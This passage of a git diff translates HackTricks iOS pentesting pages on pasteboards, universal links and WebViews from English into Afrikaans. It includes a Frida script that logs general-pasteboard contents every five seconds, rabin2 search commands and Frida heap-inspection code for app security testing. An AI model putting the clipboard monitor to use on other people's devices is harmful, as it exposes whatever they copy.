toepassingsverwyderings, 'n funksie wat beskikbaar is sedert iOS 10. +- **Aangepaste / Genoemde plakborde**: Hierdie is spesifiek vir die deling van data **binne 'n toepassing of met 'n ander toepassing** wat dieselfde span-ID deel, en is nie ontwerp om te behou buite die leeftyd van die toepassingsproses wat dit skep nie, volgens veranderinge wat in iOS 10 ingevoer is. -**Security considerations** play a significant role when utilizing pasteboards. For instance: -- There is no mechanism for users to manage app permissions to access the **pasteboard**. -- To mitigate the risk of unauthorized background monitoring of the pasteboard, access is restricted to when the application is in the foreground (since iOS 9). -- The use of persistent named pasteboards is discouraged in favor of shared containers due to privacy concerns. 
-- The **Universal Clipboard** feature introduced with iOS 10, allowing content to be shared across devices via the general pasteboard, can be managed by developers to set data expiration and disable automatic content transfer. +**Veiligheidsoorwegings** speel 'n belangrike rol wanneer plakborde gebruik word. Byvoorbeeld: +- Daar is geen meganisme vir gebruikers om toepassingstoestemming om die **plakbord** te gebruik, te bestuur nie. +- Om die risiko van ongemagtigde agtergrondmonitering van die plakbord te verminder, is toegang beperk tot wanneer die toepassing in die voorgrond is (sedert iOS 9). +- Die gebruik van volhoubare genoemde plakborde word afgeraai ten gunste van gedeelde houers as gevolg van privaatheidskwessies. +- Die **Universele Knipbord**-funksie wat met iOS 10 bekendgestel is en dit moontlik maak om inhoud oor toestelle te deel via die algemene plakbord, kan deur ontwikkelaars bestuur word om data-verval en outomatiese inhoudsoordrag te deaktiveer. -Ensuring that **sensitive information is not inadvertently stored** on the global pasteboard is crucial. Additionally, applications should be designed to prevent the misuse of global pasteboard data for unintended actions, and developers are encouraged to implement measures to prevent copying of sensitive information to the clipboard. +Dit is belangrik om te verseker dat **sensitiewe inligting nie per ongeluk op die globale plakbord gestoor word nie**. Daarbenewens moet toepassings ontwerp word om die misbruik van globale plakborddata vir onbedoelde aksies te voorkom, en ontwikkelaars word aangemoedig om maatreëls te implementeer om die kopieer van sensitiewe inligting na die knipbord te voorkom. -### Static Analysis +### Statische Analise -For static analysis, search the source code or binary for: -- `generalPasteboard` to identify usage of the **systemwide general pasteboard**. -- `pasteboardWithName:create:` and `pasteboardWithUniqueName` for creating **custom pasteboards**. 
Verify if persistence is enabled, though this is deprecated. +Vir statiese analise, soek die bronkode of binêre kode vir: +- `generalPasteboard` om die gebruik van die **stelselwye algemene plakbord** te identifiseer. +- `pasteboardWithName:create:` en `pasteboardWithUniqueName` om **aangepaste plakborde** te skep. Verifieer of volhoubaarheid geaktiveer is, alhoewel dit verouderd is. -### Dynamic Analysis +### Dinamiese Analise -Dynamic analysis involves hooking or tracing specific methods: -- Monitor `generalPasteboard` for system-wide usage. -- Trace `pasteboardWithName:create:` and `pasteboardWithUniqueName` for custom implementations. -- Observe deprecated `setPersistent:` method calls to check for persistence settings. +Dinamiese analise behels die hake of naspeur van spesifieke metodes: +- Monitor `generalPasteboard` vir stelselwye gebruik. +- Volg `pasteboardWithName:create:` en `pasteboardWithUniqueName` vir aangepaste implementasies. +- Neem kennis van verouderde `setPersistent:` metode-oproepe om volhoubaarheidsinstellings te kontroleer. -Key details to monitor include: -- **Pasteboard names** and **contents** (for instance, checking for strings, URLs, images). -- **Number of items** and **data types** present, leveraging standard and custom data type checks. -- **Expiry and local-only options** by inspecting the `setItems:options:` method. +Sleutelbesonderhede om dop te hou, sluit in: +- **Plakbordname** en **inhoud** (byvoorbeeld deur te kyk vir strings, URL's, afbeeldings). +- **Aantal items** en **datatipes** teenwoordig, deur gebruik te maak van standaard- en aangepaste datatipekontroles. +- **Verval- en slegs-plaaslike opsies** deur die `setItems:options:` metode te ondersoek. -An example of monitoring tool usage is **objection's pasteboard monitor**, which polls the generalPasteboard every 5 seconds for changes and outputs the new data. 
- -Here's a simple JavaScript script example, inspired by the objection's approach, to read and log changes from the pasteboard every 5 seconds: +'n Voorbeeld van die gebruik van 'n moniteringsinstrument is die **objection se plakbordmoniter**, wat elke 5 sekondes die generalPasteboard ondervra vir veranderinge en die nuwe data uitvoer. +Hier is 'n eenvoudige JavaScript-skripsievoorbeeld, geïnspireer deur die benadering van objection, om elke 5 sekondes veranderinge van die plakbord te lees en te log: ```javascript const UIPasteboard = ObjC.classes.UIPasteboard; const Pasteboard = UIPasteboard.generalPasteboard(); 
@@ -56,24 +53,23 @@ var items = ""; var count = Pasteboard.changeCount().toString(); setInterval(function () { - const currentCount = Pasteboard.changeCount().toString(); - const currentItems = Pasteboard.items().toString(); +const currentCount = Pasteboard.changeCount().toString(); +const currentItems = Pasteboard.items().toString(); - if (currentCount === count) { return; } +if (currentCount === count) { return; } - items = currentItems; - count = currentCount; +items = currentItems; +count = currentCount; - console.log('[* Pasteboard changed] count: ' + count + - ' hasStrings: ' + Pasteboard.hasStrings().toString() + - ' hasURLs: ' + Pasteboard.hasURLs().toString() + - ' hasImages: ' + Pasteboard.hasImages().toString()); - console.log(items); +console.log('[* Pasteboard changed] count: ' + count + +' hasStrings: ' + Pasteboard.hasStrings().toString() + +' hasURLs: ' + Pasteboard.hasURLs().toString() + +' hasImages: ' + Pasteboard.hasImages().toString()); +console.log(items); }, 1000 * 5); ``` - -## References +## Verwysings * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8) * [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi) @@ -81,16 +77,14 @@ setInterval(function () {
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-universal-links.md b/mobile-pentesting/ios-pentesting/ios-universal-links.md index f04fea69d..49cecb014 100644 --- a/mobile-pentesting/ios-pentesting/ios-universal-links.md +++ b/mobile-pentesting/ios-pentesting/ios-universal-links.md @@ -1,101 +1,95 @@ -# iOS Universal Links +# iOS Universele Skakels
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Introduction +## Inleiding -Universal links offer a **seamless redirection** experience to users by directly opening content in the app, bypassing the need for Safari redirection. These links are **unique** and secure, as they cannot be claimed by other apps. This is ensured by hosting a `apple-app-site-association` JSON file on the website's root directory, establishing a verifiable link between the website and the app. In cases where the app is not installed, Safari will take over and direct the user to the webpage, maintaining the app's presence. +Universele skakels bied 'n **naadlose omleidingservaring** aan gebruikers deur inhoud direk in die app te open, sonder die nodigheid van Safari-omleiding. Hierdie skakels is **uniek** en veilig, aangesien dit nie deur ander apps geclaim kan word nie. Dit word verseker deur 'n `apple-app-site-association` JSON-lêer op die webwerf se hoofgids te hê, wat 'n verifieerbare skakel tussen die webwerf en die app vestig. In gevalle waar die app nie geïnstalleer is nie, sal Safari oorneem en die gebruiker na die webblad lei, terwyl die app teenwoordig bly. -For penetration testers, the `apple-app-site-association` file is of particular interest as it may reveal **sensitive paths**, potentially including ones related to unreleased features. +Vir penetrasietoetsers is die `apple-app-site-association`-lêer van besondere belang, aangesien dit moontlik **sensitiewe paaie** kan onthul, moontlik insluitend paaie wat verband hou met onvrygestelde funksies. -### **Analyzing the Associated Domains Entitlement** - -Developers enable Universal Links by configuring the **Associated Domains** in Xcode's Capabilities tab or by inspecting the `.entitlements` file. Each domain is prefixed with `applinks:`. 
For example, Telegram's configuration might appear as follows: +### **Ontleding van die Verwante Domeine Toekenning** +Ontwikkelaars aktiveer Universele Skakels deur die **Verwante Domeine** te konfigureer in Xcode se Vermoëns-tabblad of deur die `.entitlements`-lêer te ondersoek. Elke domein word voorafgegaan deur `applinks:`. Byvoorbeeld, Telegram se konfigurasie kan soos volg lyk: ```xml - com.apple.developer.associated-domains - - applinks:telegram.me - applinks:t.me - +com.apple.developer.associated-domains + +applinks:telegram.me +applinks:t.me + ``` +Vir meer omvattende insigte, verwys na die [geargiveerde Apple Developer-dokumentasie](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2). -For more comprehensive insights, refer to the [archived Apple Developer Documentation](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2). +As jy werk met 'n saamgestelde toepassing, kan toekennings soos uiteengesit in [hierdie gids](extracting-entitlements-from-compiled-application.md) onttrek word. -If working with a compiled application, entitlements can be extracted as outlined in [this guide](extracting-entitlements-from-compiled-application.md). +### **Die Apple App Site Association-lêer ophaal** -### **Retrieving the Apple App Site Association File** +Die `apple-app-site-association`-lêer moet van die bediener afgehaal word deur die domeine wat in die toekennings gespesifiseer is. Maak seker dat die lêer direk toeganklik is via HTTPS by `https:///apple-app-site-association`. Hulpmiddels soos die [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) kan help met hierdie proses. -The `apple-app-site-association` file should be retrieved from the server using the domains specified in the entitlements. 
Ensure the file is accessible via HTTPS directly at `https:///apple-app-site-association`. Tools like the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) can aid in this process. +### **Hantering van Universele Skakels in die Toepassing** -### **Handling Universal Links in the App** +Die toepassing moet spesifieke metodes implementeer om universele skakels korrek te hanteer. Die primêre metode om na te kyk is [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Dit is noodsaaklik dat die skema van die behandelde URL's HTTP of HTTPS is, aangesien ander nie ondersteun sal word nie. -The app must implement specific methods to handle universal links correctly. The primary method to look for is [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). It's crucial that the scheme of URLs handled is HTTP or HTTPS, as others will not be supported. - -#### **Validating the Data Handler Method** - -When a universal link opens an app, an `NSUserActivity` object is passed to the app with the URL. Before processing this URL, it's essential to validate and sanitize it to prevent security risks. Here's an example in Swift that demonstrates the process: +#### **Validasie van die Data Handler-metode** +Wanneer 'n universele skakel 'n toepassing oopmaak, word 'n `NSUserActivity`-voorwerp na die toepassing gestuur saam met die URL. Voordat hierdie URL verwerk word, is dit noodsaaklik om dit te valideer en te saniteer om sekuriteitsrisiko's te voorkom. Hier is 'n voorbeeld in Swift wat die proses demonstreer: ```swift func application(_ application: UIApplication, continue userActivity: NSUserActivity, - restorationHandler: @escaping ([UIUserActivityRestoring]?) 
-> Void) -> Bool { - // Check for web browsing activity and valid URL - if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL { - application.open(url, options: [:], completionHandler: nil) - } +restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool { +// Check for web browsing activity and valid URL +if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL { +application.open(url, options: [:], completionHandler: nil) +} - return true +return true } ``` - -URLs should be carefully parsed and validated, especially if they include parameters, to guard against potential spoofing or malformed data. The `NSURLComponents` API is useful for this purpose, as demonstrated below: - +URL's moet sorgvuldig geparseer en gevalideer word, veral as dit parameters bevat, om te voorkom dat potensiële vervalsing of verkeerde data plaasvind. Die `NSURLComponents` API is nuttig vir hierdie doel, soos hieronder gedemonstreer: ```swift func application(_ application: UIApplication, - continue userActivity: NSUserActivity, - restorationHandler: @escaping ([Any]?) -> Void) -> Bool { - guard userActivity.activityType == NSUserActivityTypeBrowsingWeb, - let incomingURL = userActivity.webpageURL, - let components = NSURLComponents(url: incomingURL, resolvingAgainstBaseURL: true), - let path = components.path, - let params = components.queryItems else { - return false - } +continue userActivity: NSUserActivity, +restorationHandler: @escaping ([Any]?) 
-> Void) -> Bool { +guard userActivity.activityType == NSUserActivityTypeBrowsingWeb, +let incomingURL = userActivity.webpageURL, +let components = NSURLComponents(url: incomingURL, resolvingAgainstBaseURL: true), +let path = components.path, +let params = components.queryItems else { +return false +} - if let albumName = params.first(where: { $0.name == "albumname" })?.value, - let photoIndex = params.first(where: { $0.name == "index" })?.value { - // Process the URL with album name and photo index +if let albumName = params.first(where: { $0.name == "albumname" })?.value, +let photoIndex = params.first(where: { $0.name == "index" })?.value { +// Process the URL with album name and photo index - return true +return true - } else { - // Handle invalid or missing parameters +} else { +// Handle invalid or missing parameters - return false - } +return false +} } ``` - -Through **diligent configuration and validation**, developers can ensure that universal links enhance user experience while maintaining security and privacy standards. +Deur **noukeurige konfigurasie en validering**, kan ontwikkelaars verseker dat universele skakels die gebruikerservaring verbeter terwyl sekuriteits- en privaatheidsstandaarde gehandhaaf word. -## References +## Verwysings * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis) * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8) @@ -103,16 +97,14 @@ Through **diligent configuration and validation**, developers can ensure that un
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-webviews.md b/mobile-pentesting/ios-pentesting/ios-webviews.md index c2d47a562..e288feea8 100644 --- a/mobile-pentesting/ios-pentesting/ios-webviews.md +++ b/mobile-pentesting/ios-pentesting/ios-webviews.md @@ -2,31 +2,30 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-The code of this page was extracted from [here](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Check the page for further details. +Die kode van hierdie bladsy is onttrek van [hier](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Kyk na die bladsy vir verdere besonderhede. -## WebViews types +## WebViews-tipes -WebViews are utilized within applications to display web content interactively. Various types of WebViews offer different functionalities and security features for iOS applications. Here's a brief overview: +WebViews word binne programme gebruik om webinhoud interaktief weer te gee. Verskillende tipes WebViews bied verskillende funksionaliteite en sekuriteitskenmerke vir iOS-programme. Hier is 'n kort oorsig: -- **UIWebView**, which is no longer recommended from iOS 12 onwards due to its lack of support for disabling **JavaScript**, making it susceptible to script injection and **Cross-Site Scripting (XSS)** attacks. +- **UIWebView**, wat vanaf iOS 12 nie meer aanbeveel word nie as gevolg van sy gebrek aan ondersteuning vir die uitskakeling van **JavaScript**, wat dit vatbaar maak vir skripsinjeksie en **Cross-Site Scripting (XSS)**-aanvalle. -- **WKWebView** is the preferred option for incorporating web content into apps, offering enhanced control over the content and security features. **JavaScript** is enabled by default, but it can be disabled if necessary. It also supports features to prevent JavaScript from automatically opening windows and ensures that all content is loaded securely. Additionally, **WKWebView**'s architecture minimizes the risk of memory corruption affecting the main app process. - -- **SFSafariViewController** offers a standardized web browsing experience within apps, recognizable by its specific layout including a read-only address field, share and navigation buttons, and a direct link to open content in Safari. 
Unlike **WKWebView**, **JavaScript** cannot be disabled in **SFSafariViewController**, which also shares cookies and data with Safari, maintaining user privacy from the app. It must be displayed prominently according to App Store guidelines. +- **WKWebView** is die voorkeur-opsie vir die inkorporering van webinhoud in programme, en bied verbeterde beheer oor die inhoud en sekuriteitskenmerke. **JavaScript** is standaard geaktiveer, maar dit kan uitgeskakel word indien nodig. Dit ondersteun ook funksies om te voorkom dat JavaScript outomaties vensters oopmaak en verseker dat alle inhoud veilig gelaai word. Daarbenewens minimaliseer die argitektuur van **WKWebView** die risiko van geheuekorruptie wat die hoofprogramproses kan affekteer. +- **SFSafariViewController** bied 'n gestandaardiseerde webblaaier-ervaring binne programme, wat herkenbaar is aan sy spesifieke uitleg, insluitend 'n lees-slegs-adresveld, deel- en navigasieknoppies, en 'n direkte skakel om inhoud in Safari oop te maak. Anders as **WKWebView** kan **JavaScript** nie uitgeskakel word in **SFSafariViewController** nie, wat ook koekies en data deel met Safari en sodoende die gebruiker se privaatheid van die app handhaaf. Dit moet volgens die App Store-riglyne duidelik vertoon word. ```javascript // Example of disabling JavaScript in WKWebView: WKPreferences *preferences = [[WKPreferences alloc] init]; 
@@ -35,272 +34,243 @@ WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init]; config.preferences = preferences; WKWebView *webView = [[WKWebView alloc] initWithFrame:CGRectZero configuration:config]; ``` +## Opsomming van WebViews-konfigurasie-ondersoek -## WebViews Configuration Exploration Summary +### **Oorsig van Statische Analise** -### **Static Analysis Overview** - -In the process of examining **WebViews** configurations, two primary types are focused on: **UIWebView** and **WKWebView**. For identifying these WebViews within a binary, commands are utilized, searching for specific class references and initialization methods. - -- **UIWebView Identification** +In die proses van die ondersoek van WebViews-konfigurasies, word daar gefokus op twee primêre tipes: **UIWebView** en **WKWebView**. Om hierdie WebViews binne 'n binêre lêer te identifiseer, word bevele gebruik om spesifieke klasverwysings en inisialisasiemetodes te soek. +- **UIWebView-identifikasie** ```bash $ rabin2 -zz ./WheresMyBrowser | egrep "UIWebView$" ``` +Hierdie bevel help om instansies van **UIWebView** op te spoor deur te soek na teksstrings wat daarmee verband hou in die binêre lêer. -This command helps in locating instances of **UIWebView** by searching for text strings related to it in the binary. - -- **WKWebView Identification** - +- **WKWebView Identifikasie** ```bash $ rabin2 -zz ./WheresMyBrowser | egrep "WKWebView$" ``` +Op soortgelyke wyse soek hierdie bevel die binêre lêer vir teksreekse wat dui op die gebruik van **WKWebView**. -Similarly, for **WKWebView**, this command searches the binary for text strings indicative of its usage. 
- -Furthermore, to find how a **WKWebView** is initialized, the following command is executed, targeting the method signature related to its initialization: - +Verder, om uit te vind hoe 'n **WKWebView** geïnisialiseer word, word die volgende bevel uitgevoer, wat die metodesignatuur teiken wat verband hou met sy inisialisering: ```bash $ rabin2 -zzq ./WheresMyBrowser | egrep "WKWebView.*frame" ``` +#### **JavaScript-konfigurasieverifikasie** -#### **JavaScript Configuration Verification** - -For **WKWebView**, it's highlighted that disabling JavaScript is a best practice unless required. The compiled binary is searched to confirm that the `javaScriptEnabled` property is set to `false`, ensuring that JavaScript is disabled: - +Vir **WKWebView** word daar beklemtoon dat dit 'n goeie praktyk is om JavaScript te deaktiveer tensy dit nodig is. Die saamgestelde binêre lêer word deursoek om te bevestig dat die `javaScriptEnabled` eienskap op `false` ingestel is, om te verseker dat JavaScript gedeaktiveer is: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "javascriptenabled" ``` +#### **Slegs Sekure Inhoud Verifikasie** -#### **Only Secure Content Verification** - -**WKWebView** offers the capability to identify mixed content issues, contrasting with **UIWebView**. This is checked using the `hasOnlySecureContent` property to ensure all page resources are loaded through secure connections. The search in the compiled binary is performed as follows: - +**WKWebView** bied die vermoë om gemengde inhoudsprobleme te identifiseer, in teenstelling met **UIWebView**. Dit word nagegaan deur die gebruik van die `hasOnlySecureContent` eienskap om te verseker dat alle bladsybronne deur veilige verbindinge gelaai word. 
Die soektog in die saamgestelde binêre kode word as volg uitgevoer: ```bash $ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent" ``` +### **Dinamiese Analise-insigte** -### **Dynamic Analysis Insights** +Dinamiese analise behels die inspeksie van die heap vir WebView-instanties en hul eienskappe. 'n Skrip met die naam `webviews_inspector.js` word gebruik vir hierdie doel, wat `UIWebView`, `WKWebView`, en `SFSafariViewController`-instanties teiken. Dit registreer inligting oor gevonde instanties, insluitend URL's en instellings wat verband hou met JavaScript en veilige inhoud. -Dynamic analysis involves inspecting the heap for WebView instances and their properties. A script named `webviews_inspector.js` is used for this purpose, targeting `UIWebView`, `WKWebView`, and `SFSafariViewController` instances. It logs information about found instances, including URLs and settings related to JavaScript and secure content. - -Heap inspection can be conducted using `ObjC.choose()` to identify WebView instances and check `javaScriptEnabled` and `hasonlysecurecontent` properties. +Heap-inspeksie kan uitgevoer word deur `ObjC.choose()` te gebruik om WebView-instanties te identifiseer en die `javaScriptEnabled` en `hasonlysecurecontent`-eienskappe te kontroleer. 
{% code title="webviews_inspector.js" %} ```javascript ObjC.choose(ObjC.classes['UIWebView'], { - onMatch: function (ui) { - console.log('onMatch: ', ui); - console.log('URL: ', ui.request().toString()); - }, - onComplete: function () { - console.log('done for UIWebView!'); - } +onMatch: function (ui) { +console.log('onMatch: ', ui); +console.log('URL: ', ui.request().toString()); +}, +onComplete: function () { +console.log('done for UIWebView!'); +} }); ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('URL: ', wk.URL().toString()); - }, - onComplete: function () { - console.log('done for WKWebView!'); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('URL: ', wk.URL().toString()); +}, +onComplete: function () { +console.log('done for WKWebView!'); +} }); ObjC.choose(ObjC.classes['SFSafariViewController'], { - onMatch: function (sf) { - console.log('onMatch: ', sf); - }, - onComplete: function () { - console.log('done for SFSafariViewController!'); - } +onMatch: function (sf) { +console.log('onMatch: ', sf); +}, +onComplete: function () { +console.log('done for SFSafariViewController!'); +} }); ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('javaScriptEnabled:', wk.configuration().preferences().javaScriptEnabled()); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('javaScriptEnabled:', wk.configuration().preferences().javaScriptEnabled()); +} }); ObjC.choose(ObjC.classes['WKWebView'], { - onMatch: function (wk) { - console.log('onMatch: ', wk); - console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); - } +onMatch: function (wk) { +console.log('onMatch: ', wk); +console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); +} }); ``` {% endcode %} -The script is executed with: - +Die skrip word uitgevoer met: ```bash frida -U 
com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js ``` +**Belangrike uitkomste**: +- Gevalle van WebViews word suksesvol opgespoor en ondersoek. +- JavaScript-aktivering en veilige inhoudsinstellings word geverifieer. -**Key Outcomes**: -- Instances of WebViews are successfully located and inspected. -- JavaScript enablement and secure content settings are verified. +Hierdie opsomming omvat die kritieke stappe en opdragte wat betrokke is by die analise van WebView-konfigurasies deur statiese en dinamiese benaderings, met die klem op sekuriteitskenmerke soos JavaScript-aktivering en gemengde inhoudsdeteksie. -This summary encapsulates the critical steps and commands involved in analyzing WebView configurations through static and dynamic approaches, focusing on security features like JavaScript enablement and mixed content detection. +## WebView-protokolhantering -## WebView Protocol Handling +Die hantering van inhoud in WebViews is 'n kritieke aspek, veral wanneer dit kom by verskillende protokolle soos `http(s)://`, `file://`, en `tel://`. Hierdie protokolle maak dit moontlik om beide afgeleë en plaaslike inhoud binne programme te laai. Dit word beklemtoon dat wanneer plaaslike inhoud gelaai word, voorbehoudsmaatreëls getref moet word om te voorkom dat gebruikers die lêernaam of -pad beïnvloed en die inhoud self wysig. -Handling content in WebViews is a critical aspect, especially when dealing with various protocols such as `http(s)://`, `file://`, and 